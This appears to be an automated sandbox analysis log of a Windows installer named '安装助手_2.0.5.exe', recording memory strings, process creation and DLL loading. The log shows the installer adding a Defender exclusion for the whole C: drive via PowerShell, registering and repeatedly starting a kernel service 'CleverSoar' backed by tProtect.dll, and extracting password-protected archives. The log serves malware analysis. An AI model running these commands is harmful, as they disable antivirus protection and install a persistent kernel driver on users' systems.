Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.tmp, 00000002.00000003.1512591604.0000000003F19000.00000004.00001000.00020000.00000000.sdmp, is-HSQ4G.tmp.7.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeVirustotal: Detection: 8%
Source: #U5b89#U88c5#U52a9#U624b_2.0.5.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$203F6,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Process created: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp "C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp" /SL5="$30412,4753080,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-M0OUG.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar (this identical entry is listed 30 times in the report)
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.5.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-2QQ2R.tmp\#U5b89#U88c5#U52a9#U624b_2.0.5.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
